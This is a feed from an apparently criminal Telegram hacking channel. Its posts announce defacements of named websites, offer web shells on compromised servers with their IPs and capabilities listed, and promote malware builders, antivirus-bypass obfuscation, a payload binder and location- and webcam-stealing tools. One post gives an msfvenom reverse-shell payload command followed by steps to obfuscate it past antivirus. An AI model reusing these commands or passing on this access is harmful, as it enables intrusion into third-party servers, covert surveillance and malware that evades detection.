BugCod3 – Telegram
BugCod3
6.23K subscribers
308 photos
5 videos
7 files
406 links
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: T.me/BugCod3GP
📂 Topic: T.me/BugCod3Topic

🤖 Contact: T.me/BugCod3BOT
📧 Email: BugCod3@protonmail.com
Download Telegram
Site:
https://baoruba.com

Mirror-h:
https://mirror-h.org/zone/5024333/

Country: 🇺🇸

#Deface

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Site:
http://climasist.com.br
http://civ.vn

Mirror-h:
https://mirror-h.org/search/hacker/59354/

Country: 🇺🇸 🇳🇦

#Deface

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
2
PHP: 7.4.33

Safe Mode: OFF

ServerIP: 103.159.51.253 🇳🇦

HDD: Total:14.64 GB
Free:1.25 GB [8%]

useful:--------------

Downloader: --------------

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : OFF

SoftWare: nginx/1.21.0

🔗 Link

Enjoy... ⭐️

#Shell

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
👍2
A Tool With Attractive Capabilities.

Features:

⚪️ Obtain Device Information Without Any Permission !
⚪️ Access Location [SMARTPHONES]
⚪️ Access Webcam
⚪️ Access Microphone

GitHub

#Python #social_engineering_attacks #Tools

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
2
A Massive Exploiting Tool

TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus

Features !

⚪️ Fully Automating MSFvenom & Metasploit.
⚪️ Local or remote listener Generation.
⚪️ Easily Make Backdoor by category Operating System.
⚪️ Generate payloads in Various formats.
⚪️ Bypass anti-virus backdoors.
⚪️ File pumper that you can use for increasing the size of your files.
⚪️ The ability to detect external IP & Interface address .
⚪️ Automatically creates AutoRun files for USB / CDROM exploitation

GitHub

#C #Rat #Tools

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
🔥1
Python Obfuscator for FUD Python Code.

Example: Creating FUD Meterpreter Python Payload

1. Generate Python Payload:
msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt

2. Obfuscate Payload
onelinepy -m /one_line/base64 --noscript payload.txt -i 3 --output obfuscated_payload.txt

GitHub

#Python #bypass_antivirus #FUD #Tools

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
PHP: 7.4.33

Safe Mode: OFF

ServerIP: 208.109.68.144 🇺🇸

HDD: Total:1007.81 GB
Free:741.34 GB [73%]

Useful : gcc cc ld make php perl python ruby tar gzip

Downloader: wget lynx curl

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON

SoftWare: Apache

🔗 Link

#Shell

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2020-0796 Remote overflow POC

CVE-2020–0796, is pre-remote code execution vulnerability that resides in the Server Message Block 3.0 (SMBv3) network communication protocol

Which devices does the CVE-2020-0796 affect?

+ Windows 10 Version 1903 for 32-bit Systems

+ Windows 10 Version 1903 for ARM64-based Systems

+ Windows 10 Version 1903 for x64-based Systems

+ Windows 10 Version 1909 for 32-bit Systems

+ Windows 10 Version 1909 for ARM64-based Systems

+ Windows 10 Version 1909 for x64-based Systems

+ Windows Server, version 1903 (Server Core installation)

+ Windows Server, version 1909 (Server Core installation)


GitHub
GitHub

#CVE #Microsoft #POC

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
A powerful tool to bind payloads to any files

Download

#Binder #Payloads #Tools

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
SEEKER

A good tool to identify and get a quick information from the user

Concept behind Seeker is simple, just like we host phishing pages to get credentials why not host a fake page that requests your location like many popular location based websites

GitHub

#System_Information #GeoLocation #Tools

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
👍1
👍1
PHP: 5.6.36

Safe Mode: OFF

ServerIP: 2a00:f940:2:2:1:4:0:93 🇷🇺

HDD: Total:3475.35 GB
Free:667.08 GB [19%]

Useful : gcc cc ld make php perl python ruby tar gz ip nc

Downloader: wget links curll wp-mirror

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON

SoftWare: Apache

🔗 Link

Enjoy... ⭐️

#Shell

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
eDEX-UI is a fullscreen, cross-platform terminal emulator and system monitor that looks and feels like a sci-fi computer interface.

Features
:

⚪️ Fully featured terminal emulator with tabs, colors, mouse events, and support for curses and curses-like applications.
⚪️ Real-time system (CPU, RAM, swap, processes) and network (GeoIP, active connections, transfer rates) monitoring.
⚪️ Full support for touch-enabled displays, including an on-screen keyboard.
⚪️ Directory viewer that follows the CWD (current working directory) of the terminal.
⚪️ Advanced customization using themes, on-screen keyboard layouts, CSS injections. See the wiki for more info.
⚪️ Optional sound effects made by a talented sound designer for maximum hollywood hacking vibe.

GitHub

#Edex_UI #Desktop #Windows #Linux

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
1
دوره دورک نویسی حرفه ای

دورک (Dork) یا Google Dork در واقع به معنی افشای اطلاعات ناخواسته امنیتی در اینترنت می باشد که توسط موتورهای جستجو انجام می شود. در واقع می توان از Dorkبه عنوان نتیجه Google Hacking نام برد ، وقتی یک نفوذگر با استفاده از Google Hacking آسیب پذیری را پیدا می کند می تواند جستجویی که انجام داده را در اینترنت برای استفاده دیگران قرار بدهد و آسیب پذیری های سایر وب سایت ها را نیز شناسایی کند.

دورک(Dork) از آن دسته مباحثی است که در حوزه امنیت جایگاه خاصی را به خود اختصاص داده است.برای به دست آوردن دیتابیس و یا برای پیدا کردن تارگت ، بدون شک به دورک نویسی حرفه ای نیاز داریم.

در این دوره آموزشی نکات ریز کار را در مدت زمان کوتاه به شما عزیزان ارائه می کنیم.

۱. معرفی
۲. نوشتن کلمه کلیدی به روش های مختلف
۳. نکات ریز در استفاده از کلمات کلیدی
۴. ساخت دورک
۵. بیرون کشیدن دیتابیس
۶. کرک هش

Download

#Dork #Google #Google_Hacking

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
1🔥1
PHP: 5.2.17

Safe Mode: OFF

ServerIP: 187.17.111.103 [🇧🇷]

HDD: Total:5.00 GB
Free:4.81 GB [96%]

Windows:
Downloader: -------------

CURL : ON | SSH2 : OFF | Magic Quotes : ON | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF
Sole Sad & Invisible
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Microsoft-IIS/10.0

DRIVE: [ a ] [ c ] [ e ] [ j ] [ s ]

🔗 Link

Enjoy... ⭐️

#Shell

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
😢1
Apktool

It is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with app easier because of project-like files structure and automation of some repetitive tasks like building apk, etc.

GitHub
Site

#Androdi #reverse_engineering #APK #Tools

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
هزارویک دستور لینوکس
نکته
هاي آموزشی سیستم عامل لینوکس

نام کتاب: هزار و یک دستور لینوکس
نویسنده: حسین سیلانی
ویراستار و طراح جلد: ا. قاسمی نژاد
ناشر: نشر آزاد
نوبت چاپ: اول
تاریخ نشر: 1397
شمارگان: 20000 نسخه
قیمت:10000 تومان
شابک: 3-88-6987-756-975

Download

#Book #Linux #Command

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Nishang

Nishang is a framework and collection of noscripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

GitHub

#PowerShell #Penetration_Testing #RedTeam

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
PHP: 7.2.34

Safe Mode: OFF

ServerIP: 148.72.213.228 [🇸🇬]

Domains: 262 Domains

HDD: Total:199.99 GB
Free:9.18 GB [4%]

Useful : gcc cc ld make php perl python tar gzip nc

Downloader: wget lynx links curll wp-mirror

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON

SoftWare: Apache

🔗 Link

Enjoy... ⭐️

#Shell

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
🤯1